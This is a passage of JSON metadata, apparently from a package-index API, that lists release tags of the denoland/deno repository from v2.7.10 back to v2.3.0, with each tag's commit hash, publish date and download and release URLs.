leases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/